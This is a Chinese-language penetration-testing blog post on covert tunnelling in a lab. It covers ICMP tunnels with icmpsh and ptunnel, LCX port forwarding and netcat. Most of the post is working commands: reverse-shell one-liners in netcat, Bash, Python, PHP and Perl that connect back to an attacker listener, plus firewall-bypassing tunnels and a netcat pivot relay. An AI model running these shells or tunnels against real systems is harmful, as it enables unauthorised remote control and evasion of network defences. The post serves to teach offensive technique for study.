<!DOCTYPE html>


<html lang="zh-CN">


<head>
  <meta charset="utf-8" />
    
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    隐藏通信隧道技术 |  Time
  </title>
  <meta name="generator" content="hexo-theme-ayer">
  
  <link rel="shortcut icon" href="/favicon.ico" />
  
  
<link rel="stylesheet" href="/dist/main.css">

  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css">

  
<link rel="stylesheet" href="/css/custom.css">

  
  
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

  
  

  

</head>

</html>

<body>
  
  <canvas width="1777" height="841" style="position: fixed; left: 0px; top: 0px; z-index: 999; pointer-events: none;"></canvas>
  
  <div id="app">
    <main class="content on">
      <section class="outer">
  <article id="post-隐藏通信隧道技术" class="article article-type-post" itemscope
  itemprop="blogPost" data-scroll-reveal>

  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  隐藏通信隧道技术
</h1>
 

    </header>
    

    
    <div class="article-meta">
      <a href="/2020/02/18/%E9%9A%90%E8%97%8F%E9%80%9A%E4%BF%A1%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF/" class="article-date">
  <time datetime="2020-02-18T12:03:23.000Z" itemprop="datePublished">2020-02-18</time>
</a>
      
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a>
  </div>

      
      
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">1.4k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">6 分钟</span>
        </span>
    </span>
</div>

      
    </div>
    

    
    
    <div class="tocbot"></div>





    

    
    <div class="article-entry" itemprop="articleBody">
      
      

      
      <p><img src="https://tva1.sinaimg.cn/large/008eGmZEly1gn0ymrod8pj31hc0u00yf.jpg" alt="99"></p>
<a id="more"></a>

<h3 id="0x00-内网连通性判定"><a href="#0x00-内网连通性判定" class="headerlink" title="0x00 内网连通性判定"></a>0x00 内网连通性判定</h3><p>判断内网哪一层协议连通，使用对应隧道技术穿透。</p>
<p>1、网络层隧道</p>
<ul>
<li>IPv6隧道</li>
<li>ICMP隧道</li>
</ul>
<p>PS：判定连通工具，ping ip</p>
<p>2、传输层隧道</p>
<ul>
<li>TCP</li>
<li>UDP</li>
</ul>
<p>PS：判定连通工具，nc ip port</p>
<p>3、应用层隧道</p>
<ul>
<li>SSH</li>
<li>HTTP   </li>
</ul>
<p>PS：判定连通工具，Curl ip:port</p>
<ul>
<li>HTTPS</li>
<li>DNS</li>
</ul>
<p>PS:判定连通工具</p>
<p>​        nslookup 网址 [ip]</p>
<p>​        dig [@ip] 网址</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybpgy1gc26fohvh8j30v80ku76y.jpg" alt="image-20200218201151489"></p>
<h3 id="0x01-网络层隧道"><a href="#0x01-网络层隧道" class="headerlink" title="0x01 网络层隧道"></a>0x01 网络层隧道</h3><h4 id="ICMPSH工具"><a href="#ICMPSH工具" class="headerlink" title="ICMPSH工具"></a>ICMPSH工具</h4><p>安装</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">下载链接：</span><br><span class="line">git clone https:&#x2F;&#x2F;github.com&#x2F;inquisb&#x2F;icmpsh.git</span><br><span class="line"></span><br><span class="line">apt-get install python-impacket</span><br><span class="line"></span><br><span class="line">sysctl -w net.ipv4.icmp_echo_ignore_all&#x3D;1</span><br></pre></td></tr></table></figure>



<p>环境</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">攻击机：kali	192.168.0.118</span><br><span class="line">防火墙：monowall	192.168.0.116(外网) 192.168.1.1(内网)</span><br><span class="line">受控机：windows7	192.168.1.4</span><br><span class="line"></span><br><span class="line">攻击机运行命令</span><br><span class="line">.&#x2F;icmp_m.py 192.168.0.118 192.168.0.116</span><br><span class="line"></span><br><span class="line">受控机运行命令</span><br><span class="line">.&#x2F;icmp_m.exe -t 192.168.0.118</span><br></pre></td></tr></table></figure>

<p>反弹成功</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybpgy1gc26fn03gdj30va0u0gv2.jpg" alt="image-20200219204419702"></p>
<h4 id="PingTunnel工具"><a href="#PingTunnel工具" class="headerlink" title="PingTunnel工具"></a>PingTunnel工具</h4><p>安装</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">下载地址：</span><br><span class="line">https:&#x2F;&#x2F;pkgs.org&#x2F;download&#x2F;ptunnel </span><br><span class="line"></span><br><span class="line">解压</span><br><span class="line">tar-zxvf pingtunnel-0.72.tar.gz</span><br><span class="line"></span><br><span class="line">切换目录</span><br><span class="line">cd pingtunnel</span><br><span class="line"></span><br><span class="line">编译</span><br><span class="line">make &amp;&amp; make install</span><br><span class="line"></span><br><span class="line">如出现问题1:缺少pcap.h</span><br><span class="line">	wget http:&#x2F;&#x2F;www.tcpdump.org&#x2F;release&#x2F;libpcap-1.9.0.tar.gz</span><br><span class="line">	tar zxvf libpcap-1.9.0.tar.gz</span><br><span class="line">	cd libpcap-1.9.0</span><br><span class="line">	.&#x2F;configure</span><br><span class="line"></span><br><span class="line">如出现问题2:yacc包错误</span><br><span class="line">	sudo apt-get install -y byacc</span><br><span class="line">	.&#x2F;configure</span><br><span class="line">	make</span><br><span class="line">	sudo make install</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">kali安装命令(PS:kali自带)</span><br><span class="line">apt install ptunnel</span><br></pre></td></tr></table></figure>

<p>ptunnel参数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">-x	指定icmp隧道连接验证密码</span><br><span class="line">-lp	指定要监听的本地tcp端口</span><br><span class="line">-da	指定要转发到机器的ip地址</span><br><span class="line">-dp	指定要转发到机器的tcp端口</span><br><span class="line">-p	指定icmp隧道另一端的ip地址</span><br></pre></td></tr></table></figure>

<p>环境</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">受控机：192.168.1.4(内网)</span><br><span class="line">跳板机：192.168.1.7(内网),192.168.0.119(外网)</span><br><span class="line">VPS：  192.168.0.118(外网)</span><br><span class="line">攻击机：192.168.0.120</span><br><span class="line"></span><br><span class="line">攻击机-&gt;VPS(安装ptunnel)-&gt;跳板机(安装ptunnel)-&gt;受控机</span><br></pre></td></tr></table></figure>



<p>VPS运行命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ptunnel -p 192.168.0.119 -lp 1080 -da 192.168.1.4 -dp 3389 -x shuteer</span><br></pre></td></tr></table></figure>

<p><img src="https://tva1.sinaimg.cn/large/0082zybpgy1gc26fm3h8uj316c0ku0zx.jpg" alt="image-20200220001734986"></p>
<p>跳板机运行命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ptunnel -x shuteer</span><br></pre></td></tr></table></figure>

<p><img src="https://tva1.sinaimg.cn/large/0082zybpgy1gc26fl1xu0j315u0j6n5e.jpg" alt="image-20200220001858218"></p>
<p>攻击机通过远程连接访问192.168.0.118:1080</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybpgy1gc26fnvoxwj31q90u047l.jpg" alt="image-20200220002035036"></p>
<h3 id="0x02-传输层隧道"><a href="#0x02-传输层隧道" class="headerlink" title="0x02 传输层隧道"></a>0x02 传输层隧道</h3><h4 id="LCX端口转发"><a href="#LCX端口转发" class="headerlink" title="LCX端口转发"></a>LCX端口转发</h4><p>内网端口转发</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">目标机：将目标机的3389端口转发到公网4444端口</span><br><span class="line">	lcx -slave ip(公网ip) 4444 127.0.0.1 3389</span><br><span class="line">	</span><br><span class="line">公网VPS：将本机的4444端口流量转发到本机5555端口</span><br><span class="line">	lcx -listen 4444 5555</span><br></pre></td></tr></table></figure>

<p>本地端口映射</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">lcx -tran 53 目标ip 3389</span><br></pre></td></tr></table></figure>



<h4 id="NetCat"><a href="#NetCat" class="headerlink" title="NetCat"></a>NetCat</h4><p>安装</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">windows</span><br><span class="line">	https:&#x2F;&#x2F;joncraton.org&#x2F;files&#x2F;nc111nt.zip</span><br><span class="line">	https:&#x2F;&#x2F;joncraton.org&#x2F;files&#x2F;nc111nt_safe.zip</span><br><span class="line"></span><br><span class="line">linux(kali自带)</span><br><span class="line">	sudo yum install nc.x86_64</span><br></pre></td></tr></table></figure>

<p>参数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">-d 							后台模式</span><br><span class="line">-e							程序重定向</span><br><span class="line">-h							在线帮助</span><br><span class="line">-l							使用监听模式，管理和控制传入的数据</span><br><span class="line">-n							直接使用ip地址(不通过域名服务器)</span><br><span class="line">-r							随机指定本地与远程主机的通信端口</span><br><span class="line">-s&lt;源地址&gt;				设置本地主机送出的数据包的ip地址</span><br><span class="line">-u							使用udp传输协议</span><br><span class="line">-v							详细输出</span><br><span class="line">-z							将输入&#x2F;输出功能关闭，只在扫描通信端口时使用</span><br><span class="line">-g&lt;网关&gt;				 设置路由器跃程通信网关，最多可设置8个</span><br><span class="line">-G&lt;指向器数目&gt;		 设置源路由指向器的数量，值为4的倍数</span><br><span class="line">-o&lt;输出文件&gt;			指定文件名称，把往来传输的数据转换为十六进制字节码后保存在该文件中</span><br><span class="line">-p&lt;通信端口&gt;			设置本地主机使用的通信端口</span><br><span class="line">-w&lt;超时秒数&gt;			设置等待连线的时间</span><br><span class="line">-i&lt;延迟秒数&gt;			设置时间间隔，以便传送信息及扫描通信端口</span><br></pre></td></tr></table></figure>

<p>Banner信息抓取</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">抓取3389端口信息</span><br><span class="line">	nc -nv 192.168.1.4 3389</span><br></pre></td></tr></table></figure>

<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44nk4d8uj30oi02ot97.jpg" alt="image-20200221020607111"></p>
<p>端口扫描</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">扫描1-65535之间开放端口</span><br><span class="line">	nc -v -z 192.168.1.4 1-65535</span><br></pre></td></tr></table></figure>

<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44nlichuj30lo074jta.jpg" alt="image-20200221020919445"></p>
<p>端口监听</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">监听本机9999端口</span><br><span class="line">	nc -l -p 9999</span><br></pre></td></tr></table></figure>

<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44nnwa76j31700katdd.jpg" alt="image-20200221021139514"></p>
<p>文件传输</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">本机命令：nc -lp 333 &gt;1.txt</span><br><span class="line">目标机：  nc -vn 192.168.1.7 333 &lt; 1.txt -q 1</span><br></pre></td></tr></table></figure>

<p>本机</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44nl313fj316w08u0uw.jpg" alt="image-20200221022225517"></p>
<p>目标机</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44nm0mzoj30wu0fcadc.jpg" alt="image-20200221022259896"></p>
<p>简易聊天</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">本机：nc -l -p 888</span><br><span class="line">目标机：nc -vn 192.168.1.7 888</span><br></pre></td></tr></table></figure>

<p>本机</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44nndo2vj30ig04074k.jpg" alt="image-20200221022507646"></p>
<p>目标机</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44nguebmj30hq032dg1.jpg" alt="image-20200221022451853"></p>
<h6 id="获取shell"><a href="#获取shell" class="headerlink" title="获取shell"></a>获取shell</h6><p>1、正向反弹shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">目标机：</span><br><span class="line">	nc -lvp 4444 -e &#x2F;bin&#x2F;sh  (linux命令)</span><br><span class="line">	nc -lvp 4444 -e C:\WINDOWS\system32\cmd.exe	(windows命令)</span><br><span class="line">攻击机：</span><br><span class="line">	nc 192.168.1.4 4444</span><br></pre></td></tr></table></figure>

<p>目标机</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44njmrq7j30mq03wmxl.jpg" alt="image-20200221023431527"></p>
<p>攻击机</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44nhczwjj30xe0don0k.jpg" alt="image-20200221023444217"></p>
<p>2、反向反弹shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">攻击机：</span><br><span class="line">	nc -lvp 5555</span><br><span class="line"></span><br><span class="line">目标机：</span><br><span class="line">	nc 192.168.1.7 5555 -e &#x2F;bin&#x2F;sh        &#x2F;&#x2F;linux  </span><br><span class="line">	nc 192.168.1.7 5555 -e C:\WINDOWS\system32\cmd.exe  &#x2F;&#x2F;windows</span><br></pre></td></tr></table></figure>

<p>目标机</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44niqh9uj30mc02gjrk.jpg" alt="image-20200221023721557"></p>
<p>攻击机</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44nh1d7nj30ys0cg41e.jpg" alt="image-20200221023735379"></p>
<p>3、Python反向反弹shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">攻击机：</span><br><span class="line">	nc -lvp 2222</span><br><span class="line">	</span><br><span class="line">目标机：</span><br><span class="line">	python -c &#39;import socket,subprocess,os;s&#x3D;socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;192.168.43.239&quot;,2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p&#x3D;subprocess.call([&quot;&#x2F;bin&#x2F;sh&quot;,&quot;-i&quot;]);&#39;</span><br></pre></td></tr></table></figure>

<p>攻击机</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44npxs3uj315w0u0k5w.jpg" alt="image-20200221025240085"></p>
<p>目标机</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44nkpqskj31cq0tqdrw.jpg" alt="image-20200221025258574"></p>
<p>3、Bash反弹shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">攻击机：</span><br><span class="line">	nc -lvp 6666</span><br><span class="line">	</span><br><span class="line">目标机：</span><br><span class="line">	bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;192.168.43.239&#x2F;6666 0&gt;&amp;1</span><br></pre></td></tr></table></figure>

<p>攻击机</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44noj18tj31xq0sc1bp.jpg" alt="image-20200221025812726"></p>
<p>目标机</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44nmsjvsj316g0u04bc.jpg" alt="image-20200221025842628"></p>
<p>4、PHP反弹shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">攻击机：</span><br><span class="line">	nc -lvp 2222</span><br><span class="line">	</span><br><span class="line">目标机：</span><br><span class="line">	php -r &#39;$sock&#x3D;fsockopen(&quot;192.168.43.239&quot;,2222);exec(&quot;&#x2F;bin&#x2F;sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);&#39;</span><br></pre></td></tr></table></figure>

<p>攻击机</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44nqjy7gj30zp0u07js.jpg" alt="image-20200221030241478"></p>
<p>目标机</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44notwi1j319m06w0uu.jpg" alt="image-20200221030305652"></p>
<p>5、Perl反弹shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">攻击机：</span><br><span class="line">	nc -lvp 5555</span><br><span class="line">	</span><br><span class="line">目标机：</span><br><span class="line">	perl -e &#39;use Socket;$i&#x3D;&quot;192.168.43.239&quot;;$p&#x3D;5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i))))&#123;open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;&#x2F;bin&#x2F;sh -i&quot;);&#125;;&#39;</span><br></pre></td></tr></table></figure>

<p>攻击机</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44njawuvj312d0u07fq.jpg" alt="image-20200221030644058"></p>
<p>目标机</p>
<p><img src="https://tva1.sinaimg.cn/large/0082zybply1gc44ni38qej31ak05e40i.jpg" alt="image-20200221030655796"></p>
<p>6、内网代理</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">攻击机(192.168.43.239)：nc -lvp 3333</span><br><span class="line">目标机(192.168.1.4)：nc -lvp 3333 -e C:\WINDOWS\system32\cmd.exe</span><br><span class="line">边界服务器(kali边界)：nc -lvp 192.168.43.239 3333 -c &quot;nc -v 192.168.1.4 3333&quot;</span><br></pre></td></tr></table></figure>


      
      <!-- reward -->
      
    </div>
    
    
      <!-- copyright -->
      
        <div class="declare">
          <ul class="post-copyright">
            <li>
              <i class="ri-copyright-line"></i>
              <strong>版权声明： </strong>
              本博客所有文章除特别声明外，著作权归作者所有。转载请注明出处！
            </li>
          </ul>
        </div>
        
    <footer class="article-footer">
      
          
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=https://timeshu.github.io/2020/02/18/%E9%9A%90%E8%97%8F%E9%80%9A%E4%BF%A1%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" rel="tag">内网渗透</a></li></ul>


    </footer>

  </div>

  
  
  <nav class="article-nav">
    
      <a href="/2020/05/31/hello-world/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            Hello World
          
        </div>
      </a>
    
    
      <a href="/2020/02/08/%E5%9F%9F%E7%AE%A1%E7%90%86%E5%91%98%E5%AE%9A%E4%BD%8D%E5%B7%A5%E5%85%B7/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">域管理员定位工具</div>
      </a>
    
  </nav>


  

  
  
<!-- valine评论 -->
<div id="vcomments-box">
    <div id="vcomments">
    </div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src='https://cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>
<script>
    new Valine({
        el: '#vcomments',
        app_id: '',
        app_key: '',
        path: window.location.pathname,
        notify: false,
        verify: false,
        avatar: 'monsterid',
        placeholder: '给我的文章加点评论吧~',
        recordIP: true
    });
    const infoEle = document.querySelector('#vcomments .info');
    if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
        infoEle.childNodes.forEach(function (item) {
            item.parentNode.removeChild(item);
        });
    }
</script>
<style>
    #vcomments-box {
        padding: 5px 30px;
    }

    @media screen and (max-width: 800px) {
        #vcomments-box {
            padding: 5px 0px;
        }
    }

    #vcomments-box #vcomments {
        background-color: #fff;
    }

    .v .vlist .vcard .vh {
        padding-right: 20px;
    }

    .v .vlist .vcard {
        padding-left: 10px;
    }
</style>

  

  
  
  
  
  

</article>
</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2015-2021
        <i class="ri-heart-fill heart_icon"></i> John Doe
      </li>
    </ul>
    <ul>
      <li>
        
        
        
        由 <a href="https://hexo.io" target="_blank">Hexo</a> 强力驱动
        <span class="division">|</span>
        主题 - <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>访问人数:<span id="busuanzi_value_site_uv"></span></s>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>浏览次数:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s4.cnzz.com/z_stat.php?id=1278951134&amp;web_id=1278951134'></script>
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.svg" alt="Time"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/suibi">随笔</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="搜索">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <script>
      if (window.matchMedia("(max-width: 768px)").matches) {
        document.querySelector('.content').classList.remove('on');
        document.querySelector('.sidebar').classList.remove('on');
      }
    </script>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i></p>
  <div class="reward-box">
    
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/lazyload.min.js"></script>

<!-- Subtitle -->

<script>
  try {
    var typed = new Typed("#subtitle", {
      strings: ['生死看淡，不服就干', '只要学不死，就往死里学', '坚持总会胜利，不死终会出头'],
      startDelay: 0,
      typeSpeed: 200,
      loop: true,
      backSpeed: 100,
      showCursor: true
    });
  } catch (err) {
    console.log(err)
  }
</script>

<!-- Tocbot -->


<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto'
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
